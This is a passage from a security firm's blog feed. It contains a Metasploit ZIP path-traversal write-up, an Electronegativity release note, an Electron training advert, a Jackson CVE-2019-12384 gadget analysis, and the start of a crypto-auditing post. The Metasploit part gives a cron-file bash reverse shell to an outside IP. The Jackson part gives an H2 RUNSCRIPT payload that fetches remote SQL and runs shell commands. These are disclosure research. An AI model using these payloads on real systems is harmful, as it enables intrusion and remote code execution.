an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in a href=https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/db_manager/import/metasploit_framework/zip.rbzip.rb/a file em(line 157)/em that is responsible for importing a Metasploit ZIP File:/p div class=language-rb highlighter-rougediv class=highlightpre class=highlightcode span class=ndata/spanspan class=p./spanspan class=nfentries/spanspan class=p./spanspan class=nfeach/span span class=kdo/span span class=o|/spanspan class=ne/spanspan class=o|/span span class=ntarget/span span class=o=/span span class=o::/spanspan class=noFile/spanspan class=p./spanspan class=nfjoin/spanspan class=p(/spanspan [email protected]_filedata/spanspan class=p[/spanspan class=ss:zip_tmp/spanspan class=p],/span span class=ne/spanspan class=p./spanspan class=nfname/spanspan class=p)/span span class=ndata/spanspan class=p./spanspan class=nfextract/spanspan class=p(/spanspan class=ne/spanspan class=p,/spanspan class=ntarget/spanspan class=p)/span /code/pre/div/div pAs for the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as code class=language-plaintext highlighter-rougeroot/code, we could easily obtain remote command execution with high privileges using the following steps:/p ol liCreate a file with the following content: br / code class=language-plaintext highlighter-rouge* * * * * root /bin/bash -c exec /bin/bash 0lt;/dev/tcp/172.16.13.144/4444 1gt;amp;0 2gt;amp;0 0lt;amp;196;exec 196lt;gt;/dev/tcp/172.16.13.144/4445; bash lt;amp;196 gt;amp;196 2gt;amp;196/code/li liGenerate the ZIP archive with the path traversal payload: br /code class=language-plaintext highlighter-rougepython evilarc.py exploit --os unix -p etc/cron.d//code/li liAdd a valid MSF workspace to the ZIP file (in order to have MSF to extract it, otherwise it will refuse to process the ZIP archive)/li liSetup two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell)/li liLogin in the MSF Web Interface/li liCreate a new “Project”/li liSelect “Import”, “From file”, chose the evil ZIP file and finally click the “Import” button/li liWait for the import process to finish/li liEnjoy your reverse shell/li /ol pbr //p video controls= preload=auto width=100% height=100% poster=../../../public/images/msf-zip.png source src=../../../public/images/msf-zip-bug.mp4 type=video/mp4 / Your browser does not support the video tag. /video h2 id=conclusionsConclusions/h2 pIn case you are using code class=language-plaintext highlighter-rougeRubyzip/code, check the library usage and perform additional validation against the entry name and the destination path before calling code class=language-plaintext highlighter-rougeEntry#extract/code./p pHere is a small recap of the different scenarios (as of code class=language-plaintext highlighter-rougeRubyzip v1.2.2/code):/p table tr thUsage/th thInput by user?/th thVulnerable to path traversal?/th /tr tr tdentry.extract(path)/td tdyes (path)/td tdbyes/b/td /tr tr tdentry.extract(path)/td tdpartially (path is concatenated)/td tdbmaybe/b/td /tr tr tdentry.extract()/td tdpartially (entry name)/td tdno/td /tr tr tdentry.extract()/td tdno/td tdno/td /tr /table pIf you’re using Metasploit, it is a href=https://blog.rapid7.com/2019/04/19/metasploit-wrap-up-13/time to patch/a. We look forward to seeing a msf module for CVE-2019-5624./p h2 id=credits-and-referencesCredits and References/h2 pCredit for the research and bugs go to a href=https://twitter.com/[email protected]/a and a href=https://twitter.com/[email protected]/a./p pThis work has been performed during a customer engagement and a href=https://doyensec.com/research.htmlDoyensec 25% Research Time/a. As such, we would like to thank our customer and Metasploit maintainers for their support./p pIf you’re interested in the topic, take a look at the following resources:/p ul lia href=https://github.com/Rubyzip/RubyzipRubyzip Library/a/li lia href=https://guides.rubyonrails.org/Ruby on Rails Guides/a/li lia href=http://www.phrack.org/issues/69/12.htmlAttacking Ruby on Rails Applications/a/li lia href=http://www.phrack.org/issues/50/3.html1997 Portable BBS Hacking (or when Zip Slip was actually invented)/a/li lia href=https://labs.neohapsis.com/2009/04/21/directory-traversal-in-archives/Evilarc blog post (or 2019 and this post is still relevant)/a/li /ul

Electronegativity 1.3.0 released!

10 June 2019 at 22:00
pAfter the first public release of a href=https://github.com/doyensec/electronegativityElectronegativity/a, we had a great response from the community and the tool quickly became the baseline for every Electron app’s security review for many professionals and organizations. This pushed us forward, improving Electronegativity and expanding our research in the field. strongToday we are proud to release a href=https://github.com/doyensec/electronegativity/releases/tag/v1.3.0version 1.3.0/a with many new improvements and security checks for your Electron applications./strong/p video preload=auto width=100% height=100% muted= autoplay=autoplay poster=../../../public/images/electronegativity-1-3.png loop= source src=../../../public/images/electronegativity-1-3.mp4 type=video/mp4 / Your browser does not support the video tag. /video pbr //p pWe’re also excited to announce that strongthe tool has been accepted for a href=https://www.blackhat.com/us-19/arsenal/schedule/#electronegativity-identify-misconfigurations-and-security-anti-patterns-in-electron-applications-15485Black Hat USA Arsenal 2019/a/strong, where it will be showcased at the Mandalay Bay in Las Vegas. We’ll be at Arsenal Station 1 on August 7, from 4:00 pm to 5:20 pm. Drop by to see live demonstrations of Electronegativity hunting real Electron applications for vulnerabilities (or just to say hi and collect Doyensec socks)!/p pIf you’re simply interested in trying out what’s new in Electronegativity, go ahead and update or install it using NPM:/p div class=language-bash highlighter-rougediv class=highlightpre class=highlightcodespan class=nv$ /spannpm span class=nbinstall/span @doyensec/electronegativity span class=nt-g/span span class=c# or/span span class=nv$ /spannpm update @doyensec/electronegativity span class=nt-g/span /code/pre/div/div pTo review your application, use the following command:/p div class=language-bash highlighter-rougediv class=highlightpre class=highlightcodespan class=nv$ /spanelectronegativity span class=nt-i/span /path/to/electron/app /code/pre/div/div h2 id=whats-newWhat’s New/h2 pElectronegativity 1.1.1 initially shipped with a href=https://blog.doyensec.com/2019/01/24/electronegativity.html27 unique checks/a. Now it counts over a href=https://github.com/doyensec/electronegativity/wiki#electronegativity-checks40 checks/a, featuring a new advanced check system to help improve the tool’s detection capabilities in sorting out false positive and false negative findings. Here is a brief list of what’s new in this 1.3.0 release:/p ul liNow every check has an importance and accuracy attribute which helps the auditor to determine the importance of each finding. Consequently, we also introduced some new command line flags to filter the results by severity (code class=language-plaintext highlighter-rouge--severity/code) and by confidence (code class=language-plaintext highlighter-rouge--confidence/code), useful for tailored Electronegativity integration in your application security pipelines or build systems./li liWe introduced a new class of checks called emGlobalChecks/em which can dynamically set the emseverity/em and emconfidence/em for the findings or create new ones considering the inherit security risk posed by their interaction (e.g. cross-checking the code class=language-plaintext highlighter-rougenodeIntegration/code and code class=language-plaintext highlighter-rougesandbox/code flags value or the presence of the code class=language-plaintext highlighter-rougeaffinity/code flag used acrossed different windows)./li liVariable scoping analysis capabilities have been added to inspect the emFunction/em and emGlobal/em variable content, when available./li liA new single-check scan mode is now provided by passing the code class=language-plaintext highlighter-rouge-l/code flag along with a list of enabled checks (e.g. code class=language-plaintext highlighter-rouge-l AuxClickJsCheck,AuxClickHtmlCheck/code). Another command line flag has been introduced to show relative paths for files (code class=language-plaintext highlighter-rouge-r/code)./li liThe newly introduced Electron’s component ema href=https://electronjs.org/docs/api/browser-viewBrowserView/a/em is now supported, which is meant to be an alternative to the ema href=https://electronjs.org/docs/api/webview-tagWebView/a/em tag. The tool now also detects the use of the code class=language-plaintext highlighter-rougenodeIntegrationInSubFrames/code experimental option for enabling NodeJS support in sub-frames (e.g. an iframe inside a code class=language-plaintext highlighter-rougewebview/code object)./li liVarious bug fixes and new checks! (see below)/li /ul h3 id=updated-checksUpdated Checks/h3 pThis new release also comes with new and updated checks. As always, a knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities./p h4 id=affinity-checkAffinity Check/h4 pWhen specified, renderers with the same affinity will run in the same renderer process. Due to reusing the renderer process, certain code class=language-plaintext highlighter-rougewebPreferences/code options will also be shared between the web pages even when you specified different values for them. This can lead to unexpected security configuration overrides:/p pimg src=../../../public/images/electron-affinity.png alt=Affinity Property Vulnerability align=center //p pIn the above a href=https://gist.github.com/0d928ee9ed95519859dda9dc7ffc1060demo/a, the code class=language-plaintext highlighter-rougeaffinity/code set between the two code class=language-plaintext highlighter-rougeBrowserWindow/code objects will cause the unwanted share of the code class=language-plaintext highlighter-rougenodeIntegration/code property value. Electronegativity will now issue a finding reporting the usage of this flag if present./p pemRead more on the dedicated a href=https://github.com/doyensec/electronegativity/wiki/AFFINITY_GLOBAL_CHECKAFFINITY_GLOBAL_CHECK/a wiki page./em/p h4 id=allowpopups-checkAllowPopups Check/h4 pWhen the code class=language-plaintext highlighter-rougeallowpopups/code attribute is present, the guest page will be allowed to open new windows. Popups are disabled by default./p pemRead more on the a href=https://github.com/doyensec/electronegativity/wiki/ALLOWPOPUPS_HTML_CHECKALLOWPOPUPS_HTML_CHECK/a wiki page./em/p h4 id=missing-electron-security-patches-detectionMissing Electron Security Patches Detection/h4 pThis check detects if there are security patches available for the Electron version used by the target application. From this release we switched from manually updating a safe releases file to creating a routine which automatically fetches the latest releases from Electron’s official repository and determines if there are security patches available at each run./p pemRead more on the a href=https://github.com/doyensec/electronegativity/wiki/AVAILABLE_SECURITY_FIXES_GLOBAL_CHECKAVAILABLE_SECURITY_FIXES_GLOBAL_CHECK/a and a href=https://github.com/doyensec/electronegativity/wiki/ELECTRON_VERSION_JSON_CHECKELECTRON_VERSION_JSON_CHECK/a wiki page./em/p h4 id=check-for-custom-command-line-argumentsCheck for Custom Command Line Arguments/h4 pThis check will compare the custom command line arguments set in the empackage.json/em code class=language-plaintext highlighter-rougescripts/code and code class=language-plaintext highlighter-rougeconfiguration/code objects against a blacklist of dangerous arguments. The use of additional command line arguments can increase the application attack surface, disable security features or influence the overall security posture./p pemRead more on the a href=https://github.com/doyensec/electronegativity/wiki/CUSTOM_ARGUMENTS_JSON_CHECKCUSTOM_ARGUMENTS_JSON_CHECK/a wiki page./em/p h4 id=csp-presence-check-and-reviewCSP Presence Check and Review/h4 pElectronegativity now checks if a Content Security Policy (CSP) is set as an additional layer of protection against cross-site-scripting attacks and data injection attacks. If a CSP is detected, it will look for weak directives by using a a href=https://www.npmjs.com/package/@doyensec/csp-evaluatornew library/a based on the a href=https://csp-evaluator.withgoogle.com/csp-evaluator.withgoogle.com/a online tool./p pemRead more on the a href=https://github.com/doyensec/electronegativity/wiki/CSP_GLOBAL_CHECKCSP_GLOBAL_CHECK/a wiki page./em/p h4 id=dangerous-js-functions-called-with-user-supplied-dataDangerous JS Functions called with user-supplied data/h4 pLooks for occurrences of code class=language-plaintext highlighter-rougeinsertCSS/code, code class=language-plaintext highlighter-rougeexecuteJavaScript/code, code class=language-plaintext highlighter-rougeeval/code, code class=language-plaintext highlighter-rougeFunction/code, code class=language-plaintext highlighter-rougesetTimeout/code, code class=language-plaintext highlighter-rougesetInterval/code and code class=language-plaintext highlighter-rougesetImmediate/code with user-supplied input./p pemRead more on the a href=https://github.com/doyensec/electronegativity/wiki/DANGEROUS_FUNCTIONS_JS_CHECKDANGEROUS_FUNCTIONS_JS_CHECK/a wiki page./em/p h4 id=check-for-mitigations-set-to-limit-the-navigation-flowsCheck for mitigations set to limit the navigation flows/h4 pDetects if the code class=language-plaintext highlighter-rougeon()/code handler for code class=language-plaintext highlighter-rougewill-navigate/code and code class=language-plaintext highlighter-rougenew-window/code events is used. This setting can be used to limit the exploitability of certain issues. Not enforcing navigation limits leaves the Electron application under full control to remote origins in case of accidental navigation./p pemRead more on the a href=https://github.com/doyensec/electronegativity/wiki/LIMIT_NAVIGATION_GLOBAL_CHECKLIMIT_NAVIGATION_GLOBAL_CHECK/a and a href=https://github.com/doyensec/electronegativity/wiki/LIMIT_NAVIGATION_JS_CHECKLIMIT_NAVIGATION_JS_CHECK/a wiki pages/em./p h4 id=detects-if-electrons-security-warnings-have-been-disabledDetects if Electron’s security warnings have been disabled/h4 pThe tool will check if Electron’s warnings and recommendations printed to the developer console have been force-disabled by the developer. Disabling this warning may hide the presence of misconfigurations or insecure patterns to the developers./p pemRead more on the a href=https://github.com/doyensec/electronegativity/wiki/SECURITY_WARNINGS_DISABLED_JS_CHECKSECURITY_WARNINGS_DISABLED_JS_CHECK/a and a href=https://github.com/doyensec/electronegativity/wiki/SECURITY_WARNINGS_DISABLED_JSON_CHECKSECURITY_WARNINGS_DISABLED_JSON_CHECK/a wiki pages/em./p h4 id=detects-if-setpermissionrequesthandler-is-missing-for-untrusted-originsDetects if setPermissionRequestHandler is missing for untrusted origins/h4 pNot enforcing custom checks for permission requests (e.g. media) leaves the Electron application under full control of the remote origin. For instance, a Cross-Site Scripting vulnerability can be used to access the browser media system and silently record audio/video. Because of this, Electronegativity will also check if a code class=language-plaintext highlighter-rougesetPermissionRequestHandler/code has been set./p pemRead more on the a href=https://github.com/doyensec/electronegativity/wiki/PERMISSION_REQUEST_HANDLER_GLOBAL_CHECKPERMISSION_REQUEST_HANDLER_GLOBAL_CHECK/a wiki page./em/p p…and more to come! If you are a developer, we encourage you to use Electronegativity to understand how these Electron’s security pitfalls affect your application and how to avoid them. We really believe that Electron deserves a strong security community behind and that creating the right and robust tools to help this community is the first step towards improving the whole Electron’s ecosystem security stance./p pAs a final remark, we’d like to thank all past and present contributors to this tool: a href=https://twitter.com/[email protected]/a, a href=https://twitter.com/[email protected]/a, a href=https://twitter.com/[email protected]/a, a href=https://twitter.com/[email protected]/a, a href=https://twitter.com/[email protected]/a, and ultimately a href=https://twitter.com/[email protected]/a for sponsoring this release./p pSee you in Vegas!/p [email protected]/p

Electron Security Workshop

2 July 2019 at 22:00
h2 id=2-days-training-on-how-to-build-secure-electron-applications2-Days Training on How to Build Secure Electron Applications/h2 pWe are excited to present our brand-new class on Electron Security! This blog post provides a general overview of the 2-days workshop./p pimg src=../../../public/images/electronlogo.png width=400 alt=ElectronJS Logo align=center //p pWith the increasing popularity of the a href=https://electronjs.org/ElectronJs Framework/a, we decided to create a class that teaches students how to build and maintain secure desktop applications that are resilient to attacks and common classes of vulnerabilities. Building secure Electron applications is possible, but complicated. You need to know the framework, follow its evolution, and constantly update and devise in depth defense mechanisms to mitigate its deficiencies./p pOur training begins with an overview of Electron internals and the life cycle of a typical Electron-based application. After a quick intro, we will jump straight into threat modeling and attack surface. We will analyze what are the common root causes for misconfigurations and vulnerabilities. The class will be centered around two main topics: subverting the framework and breaking the custom application code. We will present security misconfigurations, security anti-patterns, emnodeIntegration/em and emsandbox/em bypasses, insecure empreload/em bugs, prototype pollution attacks, emaffinity/em abuses and much more./p pThe class is hands-on with many live examples. The exercises and scenarios will help students understand how to identify vulnerabilities and build mitigations. Throughout the class, we will also have a few Qamp;A panels to answer all questions attendees might have and potentially review their code./p pIf you’re interested, check out this short teaser:/p style .videoWrapper { position: relative; padding-bottom: 56.25%; /* 16:9 */ padding-top: 25px; height: 0; } .videoWrapper iframe { position: absolute; top: 0; left: 0; width: 100%; height: 100%; } /style div class=videoWrapper iframe width=560 height=349 src=https://www.youtube.com/embed/oTJOE6LOPks frameborder=0 allowfullscreen=/iframe /div h3 id=audience-profileAudience Profile/h3 pWho should take this course?/p ul liJavaScript and Node.js Developers/li liSecurity Engineers/li liSecurity Auditors and Pentesters/li /ul pWe will provide details on how to find and fix security vulnerabilities, which makes this class suitable for both blue and red teams. Basic JavaScript development experience and basic understanding of web application security (e.g. XSS) is required./p h3 id=general-informationGeneral Information/h3 pAttendees will receive a bundle with all material, including:/p ul liWorkshop presentation (over 200 slides)/li liCode, exploits and artifacts of all exercises/li liCertificate of completion/li /ul pThis 2-days training is delivered in English, either remotely or on-site (worldwide)./p pDoyensec will accept up to 15 attendees per tutor. If the number of attendees exceeds the maximum allowed, Doyensec will allocate additional tutors./p pWe’re a flexible security boutique and can further customize the agenda to your specific company’s needs./p pstrongFeel free to contact us at a href=mailto:[email protected]@doyensec.com/a for scheduling your class!/strong/p

Jackson gadgets - Anatomy of a vulnerability

21 July 2019 at 22:00
h2 id=jackson-cve-2019-12384-anatomy-of-a-vulnerability-classJackson CVE-2019-12384: anatomy of a vulnerability class/h2 pDuring one of our engagements, we analyzed an application which used the a href=https://github.com/FasterXML/jacksonJackson/a library for deserializing JSONs. In that context, we have identified a deserialization vulnerability where we could control the class to be deserialized. In this article, we want to show how an attacker may leverage this deserialization vulnerability to trigger attacks such as Server-Side Request Forgery (SSRF) and remote code execution./p pThis research also resulted in a new a href=https://access.redhat.com/security/cve/cve-2019-12384CVE-2019-12384/a and a bunch of RedHat products affected by it:/p !-- put image about the impact -- pimg src=../../../public/images/jackson-impact.png alt=Vulnerability Impact align=center width=500 //p h2 id=what-is-requiredWhat is required?/h2 pAs reported by Jackson’s author in a href=https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96On Jackson CVEs: Don’t Panic — Here is what you need to know/a the requirements for a Jackson “gadget” vulnerability are:/p ol li p(1) The application accepts JSON content sent by an untrusted client (composed either manually or by a code you did not write and have no visibility or control over) — meaning that you can not constrain JSON itself that is being sent/p /li li p(2) The application uses polymorphic type handling for properties with nominal type of emjava.lang.Object/em (or one of small number of “permissive” tag interfaces such as emjava.util.Serializable/em, emjava.util.Comparable/em)/p /li li p(3) The application has at least one specific “gadget” class to exploit in the Java classpath. In detail, exploitation requires a class that works with Jackson. In fact, most gadgets only work with specific libraries — e.g. most commonly reported ones work with JDK serialization/p /li li p(4) The application uses a version of Jackson that does not (yet) block the specific “gadget” class. There is a set of published gadgets which grows over time so it is a race between people finding and reporting gadgets and the patches. Jackson operates on a blacklist. The deserialization is a “feature” of the platform and they continually update a a href=https://github.com/FasterXML/jackson-databind/blob/master/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.javablacklist of known gadgets that people report/a./p /li /ol pIn this research we assumed that the preconditions (1) and (2) are satisfied. Instead, we concentrated on finding a gadget that could meet both (3) and (4). Please note that Jackson is one of the most used deserialization frameworks for Java applications where polymorphism is a first-class concept. Finding these conditions comes at zero-cost to a potential attacker who may use a href=https://find-sec-bugs.github.io/bugs.htm#JACKSON_UNSAFE_DESERIALIZATIONstatic analysis tools/a or other dynamic techniques, such as grepping for code class=language-plaintext [email protected]/code in request/responses, to find these targets./p h2 id=preparing-for-the-battlefieldPreparing for the battlefield/h2 pDuring our research we developed a tool to assist the discovery of such vulnerabilities. When Jackson deserializes code class=language-plaintext highlighter-rougech.qos.logback.core.db.DriverManagerConnectionSource/code, this class can be abused to instantiate a JDBC connection. JDBC stands for (J)ava (D)ata(b)ase (C)onnectivity. JDBC is a Java API to connect and execute a query with the database and it is a part of JavaSE (Java Standard Edition). Moreover, JDBC uses an automatic string to class mapping, as such it is a perfect target to load and execute even more “gadgets” inside the chain./p pIn order to demonstrate the attack, we prepared a wrapper in which we load arbitrary polymorphic classes specified by an attacker. For the environment we used a href=https://www.jruby.org/jRuby/a, a ruby implementation running on top of the Java Virtual Machine (JVM). With its integration on top of the JVM, we can easily load and instantiate Java classes./p pWe’ll use this setup to load Java classes easily in a given directory and prepare the Jackson environment to meet the first two requirements (1,2) listed above. In order to do that, we implemented the following a href=https://www.jruby.org/jRuby/a script./p div class=language-ruby highlighter-rougediv class=highlightpre class=highlightcodespan class=nbrequire/span span class=s1'java'/span span class=noDir/spanspan class=p[/spanspan class=s2./classpath/*.jar/spanspan class=p]./spanspan class=nfeach/span span class=kdo/span span class=o|/spanspan class=nf/spanspan class=o|/span span class=nbrequire/span span class=nf/span span class=kend/span span class=njava_import/span span class=s1'com.fasterxml.jackson.databind.ObjectMapper'/span span class=njava_import/span span class=s1'com.fasterxml.jackson.databind.SerializationFeature'/span span class=ncontent/span span class=o=/span span class=noARGV/spanspan class=p[/spanspan class=mi0/spanspan class=p]/span span class=nbputs/span span class=s2Mapping/span span class=nmapper/span span class=o=/span span class=noObjectMapper/spanspan class=p./spanspan class=nfnew/span span class=nmapper/spanspan class=p./spanspan class=nfenableDefaultTyping/spanspan class=p()/span span class=nmapper/spanspan class=p./spanspan class=nfconfigure/spanspan class=p(/spanspan class=noSerializationFeature/spanspan class=o::/spanspan class=noFAIL_ON_EMPTY_BEANS/spanspan class=p,/span span class=kpfalse/spanspan class=p);/span span class=nbputs/span span class=s2Serializing/span span class=nobj/span span class=o=/span span class=nmapper/spanspan class=p./spanspan class=nfreadValue/spanspan class=p(/spanspan class=ncontent/spanspan class=p,/span span class=njava/spanspan class=p./spanspan class=nflang/spanspan class=o./spanspan class=noObject/spanspan class=p./spanspan class=nfjava_class/spanspan class=p)/span span class=c1# invokes all the setters/span span class=nbputs/span span class=s2objectified/span span class=nbputs/span span class=s2stringified: /span span class=o+/span span class=nmapper/spanspan class=p./spanspan class=nfwriteValueAsString/spanspan class=p(/spanspan class=nobj/spanspan class=p)/span /code/pre/div/div pThe script proceeds as follows:/p ol liAt line 2, it loads all of the classes contained in the Java Archives (JAR) within the “classpath” subdirectory/li liBetween lines 5 and 13, it configures Jackson in order to meet requirements (#2)/li liBetween lines 14 and 17, it deserializes and serializes a polymorphic Jackson object passed to jRuby as JSON/li /ol h2 id=memento-reaching-the-gadgetMemento: reaching the gadget/h2 pFor this research we decided to use gadgets that are widely used by the Java community. All the libraries targeted in order to demonstrate this attack are in the top 100 most common libraries in the a href=https://search.maven.org/Maven central/a repository./p pTo follow along and to prepare for the attack, you can download the following libraries and put them in the “classpath” directory:/p ul lia href=http://central.maven.org/maven2/com/fasterxml/jackson/core/jackson-databind/2.9.8/jackson-databind-2.9.8.jarjackson-databind-2.9.8/a/li lia href=http://central.maven.org/maven2/com/fasterxml/jackson/core/jackson-annotations/2.9.8/jackson-annotations-2.9.8.jarjackson-annotations-2.9.8/a/li lia href=http://central.maven.org/maven2/com/fasterxml/jackson/core/jackson-core/2.9.8/jackson-core-2.9.8.jarjackson-core-2.9.8/a/li lia href=http://central.maven.org/maven2/ch/qos/logback/logback-core/1.3.0-alpha4/logback-core-1.3.0-alpha4.jarlogback-core-1.3.0-alpha4/a/li lia href=http://central.maven.org/maven2/com/h2database/h2/1.4.199/h2-1.4.199.jarh2-1.4.199/a/li /ul pIt should be noted the code class=language-plaintext highlighter-rougeh2/code library is not required to perform SSRF, since our experience suggests that most of the time Java applications load at least one JDBC Driver. JDBC Drivers are classes that, when a JDBC url is passed in, are automatically instantiated and the full URL is passed to them as an argument./p pUsing the following command, we will call the previous script with the aforementioned classpath./p div class=language-bash highlighter-rougediv class=highlightpre class=highlightcodespan class=nv$ /spanjruby test.rb span class=s2[/spanspan class=se\/spanspan class=s2ch.qos.logback.core.db.DriverManagerConnectionSource/spanspan class=se\/spanspan class=s2, {/spanspan class=se\/spanspan class=s2url/spanspan class=se\/spanspan class=s2:/spanspan class=se\/spanspan class=s2jdbc:h2:mem:/spanspan class=se\/spanspan class=s2}]/span /code/pre/div/div pOn line 15 of the script, Jackson will recursively call all of the setters with the key contained inside the subobject. To be more specific, the code class=language-plaintext highlighter-rougesetUrl(String url)/code is called with arguments by the Jackson reflection library. After that phase (line 17) the full object is serialized into a JSON object again. At this point all the fields are serialized directly, if no getter is defined, or through an explicit getter. The interesting getter for us is code class=language-plaintext highlighter-rougegetConnection()/code. In fact, as an attacker, we are interested in all a href=http://tutorials.jenkov.com/java-functional-programming/index.html#pure-functions“non pure” methods/a that have interesting side effects where we control an argument./p pWhen the code class=language-plaintext highlighter-rougegetConnection/code is called, an in memory database is instantiated. Since the application is short lived, we won’t see any meaningful effect from the attacker’s perspective. In order to do something more meaningful we create a connection to a remote database. If the target application is deployed as a remote service, an attacker can generate a Server Side Request Forgery (SSRF). The following screenshot is an example of this scenario./p !-- put screenshot here -- pimg src=../../../public/images/jackson-chain.png alt=Jackson Chain align=center //p h2 id=enter-the-matrix-from-ssrf-to-rceEnter the Matrix: From SSRF to RCE/h2 pAs you may have noticed both of these scenarios lead to DoS and SSRF. While those attacks may affect the application security, we want to show you a simple and effective technique to turn a SSRF into a full chain RCE./p pIn order to gain full code execution in the context of the application, we employed the capability of loading the a href=http://www.h2database.com/html/features.htmlH2/a JDBC Driver. a href=http://www.h2database.com/html/features.htmlH2/a is a super fast SQL database usually employed as in memory replacement for full-fledged SQL Database Management Systems (such as Postgresql, MSSql, MySql or OracleDB). It is easily configurable and it actually supports many modes such as in memory, on file, and on remote servers. H2 has the capability to run SQL scripts from the JDBC URL, which was added in order to have an in-memory database that supports init a href=https://edgeguides.rubyonrails.org/active_record_migrations.htmlmigrations/a. This alone won’t allow an attacker to actually execute Java code inside the JVM context. However a href=http://www.h2database.com/html/features.htmlH2/a, since it was implemented inside the JVM, a href=https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.htmlhas the capability to specify custom aliases containing java code/a. This is what we can abuse to execute arbitrary code./p pWe can easily serve the following code class=language-plaintext highlighter-rougeinject.sql/code INIT file through a simple http server such as a python one (e.g. code class=language-plaintext highlighter-rougepython -m SimpleHttpServer/code)./p div class=language-plaintext highlighter-rougediv class=highlightpre class=highlightcodeCREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { String[] command = {bash, -c, cmd}; java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter(\\A); return s.hasNext() ? s.next() : ; } $$; CALL SHELLEXEC('id gt; exploited.txt') /code/pre/div/div pAnd run the tester application with:/p div class=language-bash highlighter-rougediv class=highlightpre class=highlightcodespan class=nv$ /spanjruby test.rb span class=s2[/spanspan class=se\/spanspan class=s2ch.qos.logback.core.db.DriverManagerConnectionSource/spanspan class=se\/spanspan class=s2, {/spanspan class=se\/spanspan class=s2url/spanspan class=se\/spanspan class=s2:/spanspan class=se\/spanspan class=s2jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'/spanspan class=se\/spanspan class=s2}]/span ... span class=nv$ /spanspan class=nbcat /spanexploited.txt span class=nvuid/spanspan class=o=/span501span class=o(/span...span class=o)/span span class=nvgid/spanspan class=o=/span20span class=o(/spanstaffspan class=o)/span span class=nbgroups/spanspan class=o=/span20span class=o(/spanstaffspan class=o)/span,12span class=o(/spaneveryonespan class=o)/span,61span class=o(/spanlocalaccountsspan class=o)/span,79span class=o(/span_appserverusrspan class=o)/span,80span class=o(/spanadminspan class=o)/span,81span class=o(/span_appserveradmspan class=o)/span,98span class=o(/span_lpadminspan class=o)/span,501span class=o(/spanaccess_bpfspan class=o)/span,701span class=o(/spancom.apple.sharepoint.group.1span class=o)/span,33span class=o(/span_appstorespan class=o)/span,100span class=o(/span_lpoperatorspan class=o)/span,204span class=o(/span_developerspan class=o)/span,250span class=o(/span_analyticsusersspan class=o)/span,395span class=o(/spancom.apple.access_ftpspan class=o)/span,398span class=o(/spancom.apple.access_screensharingspan class=o)/span,399span class=o(/spancom.apple.access_sshspan class=o)/span /code/pre/div/div pVoila’!/p h2 id=iterative-taint-trackingIterative Taint-Tracking/h2 pExploitation of deserialization vulnerabilities is complex and takes time. When conducting a product security review, time constraints can make it difficult to find the appropriate gadgets to use in exploitation. On the other end, the Jackson blacklists are updated on a monthly basis while users of this mechanism (e.g. enterprise applications) may have yearly release cycles./p pDeserialization vulnerabilities are the typical needle-in-the-haystack problem. On the one hand, identifying a vulnerable entry point is an easy task, while finding a useful gadget may be time consuming (and tedious). At Doyensec we developed a technique to find useful Jackson gadgets to facilitate the latter effort. We built a static analysis tool that can find serialization gadgets through a href=https://en.wikipedia.org/wiki/Taint_checkingtaint-tracking/a analysis. We designed it to be fast enough to run multiple times and iterate/improve through a custom and extensible rule-set language. On average a run on a Macbook PRO i7 2018 takes 2 minutes./p !-- put a picture here of taint tracking -- pimg src=../../../public/images/jackson-taint.png alt=Jackson Taint Tracking align=center width=500 //p pTaint-tracking is a topical academic research subject. Academic research tools are focused on a very high recall and precision. The trade-off lies between high-recall/precision versus speed/memory. Since we wanted this tool to be usable while testing commercial grade products and we valued the customizability of the tool by itself, we focused on speed and usability instead of high recall. While the tool is inspired by other research such as a href=https://blogs.uni-paderborn.de/sse/tools/flowdroid/flowdroid/a, the focus of our technique is not to rule out the human analyst. Instead, we believe in augmenting manual testing and exploitation with customizable a href=https://doyensec.com/automation.htmlsecurity automation/a./p pThis research was possible thanks to the a href=https://doyensec.com/careers.html25% research time/a at Doyensec. Tune in again for new episodes./p pThat’s all folks! Keep it up and be safe!/p

Lessons in auditing cryptocurrency wallets, systems, and infrastructures

31 July 2019 at 22:00
pIn the past three years, Doyensec has been providing security testing services for some of the global brands in the cryptocurrency world. We have audited desktop and mobile wallets, exchanges web interfaces, custody systems, and backbone infrastructure components./p pWe have seen many things done right, but also discovered many design and implementation vulnerabilities. Failure is a great lesson in security and can always be turned into positive teaching for the future. Learning from past mistakes is the key to create better systems./p pimg src=../../../public/images/doyensec_cryptosec.jpg alt=Vulnerability Impact align=center width=700 //p pIn this article, we will guide you through a selection of four simple (yet dangerous!) application vulnerabilities./p blockquote pstrongBreaking Crypto Currency Systems != Breaking Crypto/strong (at least not always)/p pFor that, you would probably need to wait for a href=https://www.blackhat.com/us-19/briefings/schedule/#lessons-from-two-years-of-crypto-audits-14738Jean-Philippe Aumasson’s talk/a at the upcoming BlackHat Vegas./p /blockquote pThis blog post was brought to you by a href=https://twitter.com/ggisxKevin Joensen/a and Mateusz Swidniak./p h2 id=1-cors-misconfigurations1) CORS Misconfigurations/h2 pa href=https://developer.mozilla.org/en-US/docs/Web/HTTP/CORSCross-Origin Resource Sharing/a is used for relaxing the Same Origin Policy. This mechanism enables communication between websites hosted on different domains. A misconfigured CORS can have a great impact on the website security posture as other sites might access the page content./p pImagine a website with the following HTTP response headers:/p div class=language-html highlighter-rougediv class=highlightpre class=highlightcodeAccess-Control-Allow-Origin: null Access-Control-Allow-Credentials: true /code/pre/div/div pIf an attacker has successfully lured a victim to their website, they can easily issue an HTTP request with a emnull/em origin using an emiframe/em tag and a emsandbox/em attribute./p div class=language-html highlighter-rougediv class=highlightpre class=highlightcodespan class=ntlt;iframe/span span class=nasandbox=/spanspan class=sallow-scripts/span span class=nasrc=/spanspan 